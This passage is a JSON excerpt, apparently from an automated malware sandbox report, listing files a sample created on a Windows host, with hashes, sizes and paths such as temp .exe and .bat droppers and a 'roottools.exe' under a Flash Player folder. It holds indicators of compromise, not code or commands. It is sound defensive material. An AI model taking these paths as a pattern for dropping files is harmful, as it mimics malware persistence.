"da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_14", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar43c6.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_17", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab5979.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_18", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar597a.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_27", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab7a2e.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_28", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar7a2f.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_31", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab7a4f.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_32", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar7a50.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_35", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab7a70.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_36", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar7a71.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_39", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@google[1].txt", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_42", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab85a9.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_43", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar85b9.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_49", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_62", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\g[1].txt", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_63", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\ew[1].txt", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_64", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\jw[1].txt", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_65", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\0wqaga[1].txt", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_66", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_68", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_70", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabaed4.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_71", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\taraed5.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_74", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@google[2].txt", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_87", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\coob07b.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_90", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\flab08c.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_91", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08d.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_92", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08e.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_93", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb08f.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_94", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb090.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_95", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb091.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_96", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb092.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_97", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a3.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_104", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a4.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_105", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a5.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_106", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabb0a6.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_113", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\sofb0d5.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/854db67ad532a4af63443f8e6f684762e3c9efca", "file_type": "created_file", "id": "file_6", "md5_hash": "71c63dd6822598c7f7c7ab4c9ceb6ba9", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe", "sha1_hash": "854db67ad532a4af63443f8e6f684762e3c9efca", "sha256_hash": "99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083", "size": 196608, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/854db67ad532a4af63443f8e6f684762e3c9efca", "file_type": "created_file", "id": "file_50", "md5_hash": "71c63dd6822598c7f7c7ab4c9ceb6ba9", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe", "sha1_hash": "854db67ad532a4af63443f8e6f684762e3c9efca", "sha256_hash": "99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083", "size": 196608, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/3ea3a7be8ec7b7cce6e9cc1b52c77199858119a6", "file_type": "created_file", "id": "file_8", "md5_hash": "b1dd1aa15fb939d335f5c39a8ed85ab8", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\updaa5900b0.bat", "sha1_hash": "3ea3a7be8ec7b7cce6e9cc1b52c77199858119a6", "sha256_hash": "8ba84a14936373863bb48478a9c13ac8d67e08ff26a4eb5c6bd88237587e6ffd", "size": 200, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da545c3133a914434cce940bae78d8ad180a529a", "file_type": "created_file", "id": "file_11", "md5_hash": "03f9e1f45c0d5fe8e08af7449ba1fa2f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab4336.tmp", "sha1_hash": "da545c3133a914434cce940bae78d8ad180a529a", "sha256_hash": "677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311", "size": 53978, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da545c3133a914434cce940bae78d8ad180a529a", "file_type": "created_file", "id": "file_15", "md5_hash": "03f9e1f45c0d5fe8e08af7449ba1fa2f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab43c5.tmp", "sha1_hash": "da545c3133a914434cce940bae78d8ad180a529a", "sha256_hash": "677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311", "size": 53978, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da545c3133a914434cce940bae78d8ad180a529a", "file_type": "created_file", "id": "file_19", "md5_hash": "03f9e1f45c0d5fe8e08af7449ba1fa2f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab5979.tmp", "sha1_hash": "da545c3133a914434cce940bae78d8ad180a529a", "sha256_hash": "677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311", "size": 53978, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da545c3133a914434cce940bae78d8ad180a529a", "file_type": "created_file", "id": "file_29", "md5_hash": "03f9e1f45c0d5fe8e08af7449ba1fa2f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab7a2e.tmp", "sha1_hash": "da545c3133a914434cce940bae78d8ad180a529a", "sha256_hash": "677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311", "size": 53978, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da545c3133a914434cce940bae78d8ad180a529a", "file_type": "created_file", "id": "file_33", "md5_hash": "03f9e1f45c0d5fe8e08af7449ba1fa2f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab7a4f.tmp", "sha1_hash": "da545c3133a914434cce940bae78d8ad180a529a", "sha256_hash": "677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311", "size": 53978, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da545c3133a914434cce940bae78d8ad180a529a", "file_type": "created_file", "id": "file_37", "md5_hash": "03f9e1f45c0d5fe8e08af7449ba1fa2f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab7a70.tmp", "sha1_hash": "da545c3133a914434cce940bae78d8ad180a529a", "sha256_hash": "677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311", "size": 53978, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da545c3133a914434cce940bae78d8ad180a529a", "file_type": "created_file", "id": "file_44", "md5_hash": "03f9e1f45c0d5fe8e08af7449ba1fa2f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cab85a9.tmp", "sha1_hash": "da545c3133a914434cce940bae78d8ad180a529a", "sha256_hash": "677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311", "size": 53978, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da545c3133a914434cce940bae78d8ad180a529a", "file_type": "created_file", "id": "file_72", "md5_hash": "03f9e1f45c0d5fe8e08af7449ba1fa2f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\cabaed4.tmp", "sha1_hash": "da545c3133a914434cce940bae78d8ad180a529a", "sha256_hash": "677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311", "size": 53978, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/71386477836e4081befb501a266ccc4c984030e0", "file_type": "created_file", "id": "file_12", "md5_hash": "4479a52b31b6bde89384fb63854ec382", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar4337.tmp", "sha1_hash": "71386477836e4081befb501a266ccc4c984030e0", "sha256_hash": "8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2", "size": 129813, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/71386477836e4081befb501a266ccc4c984030e0", "file_type": "created_file", "id": "file_16", "md5_hash": "4479a52b31b6bde89384fb63854ec382", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar43c6.tmp", "sha1_hash": "71386477836e4081befb501a266ccc4c984030e0", "sha256_hash": "8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2", "size": 129813, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/71386477836e4081befb501a266ccc4c984030e0", "file_type": "created_file", "id": "file_20", "md5_hash": "4479a52b31b6bde89384fb63854ec382", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar597a.tmp", "sha1_hash": "71386477836e4081befb501a266ccc4c984030e0", "sha256_hash": "8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2", "size": 129813, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/71386477836e4081befb501a266ccc4c984030e0", "file_type": "created_file", "id": "file_30", "md5_hash": "4479a52b31b6bde89384fb63854ec382", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar7a2f.tmp", "sha1_hash": "71386477836e4081befb501a266ccc4c984030e0", "sha256_hash": "8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2", "size": 129813, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/71386477836e4081befb501a266ccc4c984030e0", "file_type": "created_file", "id": "file_34", "md5_hash": "4479a52b31b6bde89384fb63854ec382", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar7a50.tmp", "sha1_hash": "71386477836e4081befb501a266ccc4c984030e0", "sha256_hash": "8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2", "size": 129813, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/71386477836e4081befb501a266ccc4c984030e0", "file_type": "created_file", "id": "file_38", "md5_hash": "4479a52b31b6bde89384fb63854ec382", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar7a71.tmp", "sha1_hash": "71386477836e4081befb501a266ccc4c984030e0", "sha256_hash": "8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2", "size": 129813, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/71386477836e4081befb501a266ccc4c984030e0", "file_type": "created_file", "id": "file_45", "md5_hash": "4479a52b31b6bde89384fb63854ec382", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\tar85b9.tmp", "sha1_hash": "71386477836e4081befb501a266ccc4c984030e0", "sha256_hash": "8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2", "size": 129813, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/71386477836e4081befb501a266ccc4c984030e0", "file_type": "created_file", "id": "file_73", "md5_hash": "4479a52b31b6bde89384fb63854ec382", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\taraed5.tmp", "sha1_hash": "71386477836e4081befb501a266ccc4c984030e0", "sha256_hash": "8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2", "size": 129813, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a439414520213ebc9e009ef0280efbc4c442506c", "file_type": "created_file", "id": "file_22", "md5_hash": "9d4f7d11a38b13abfffb23c26855ef96", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\sgw[1].txt", "sha1_hash": "a439414520213ebc9e009ef0280efbc4c442506c", "sha256_hash": "e73f65e4321a8a5af6a80097a853cd49fd7a3eedd72bfdee47a3eab0a0015663", "size": 5784, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/946fa1fe444c25648522407a7c690ea43e0d3837", "file_type": "created_file", "id": "file_23", "md5_hash": "f3963866cf1b0a9cae95cf0ec6aae77e", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv", "sha1_hash": "946fa1fe444c25648522407a7c690ea43e0d3837", "sha256_hash": "b4710fc930d2add348793b3160ed9c45b24ee8dcae605ee8ae198c107ef43285", "size": 1776, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/19f920fe20fb0368145fe224cbb6bc93c1c5db86", "file_type": "created_file", "id": "file_24", "md5_hash": "aa11e7edd31a5aa3003171b3ce6a1e63", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\rijuql1c\\dw[1].txt", "sha1_hash": "19f920fe20fb0368145fe224cbb6bc93c1c5db86", "sha256_hash": "c39527e8fc3c7154327298c32145bc51f21ab57c71297a374b89d95b46500b89", "size": 3224, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/376783a4491e556cf55f5b6d3f5ef8edcb6d4faa", "file_type": "created_file", "id": "file_25", "md5_hash": "084cd34da60abfe463f4bcdf6ff6c7c4", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\microsoft onedrive.rig", "sha1_hash": "376783a4491e556cf55f5b6d3f5ef8edcb6d4faa", "sha256_hash": "ceddead7e5868e0d0bd135ad23248b1c6562111ccb65bdba7e1cc37314c02712", "size": 720, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/b49450a4a7844b312769bd7ae0628aa1f0426efe", "file_type": "created_file", "id": "file_40", "md5_hash": "7372fbe29d49e31bd4002a12ff10b319", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\aetadzjz@google[1].txt", "sha1_hash": "b49450a4a7844b312769bd7ae0628aa1f0426efe", "sha256_hash": "1e52ee6f27cb7c984dc23b4cd48c641438fcff2a7dc3048b04fedc51476202c4", "size": 281, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/09f4d50cd2573e52623a19c40d987508d5c09bcb", "file_type": "created_file", "id": "file_41", "md5_hash": "5bce4a525f0d6dba211e09b60f144bf9", "norm_filename": 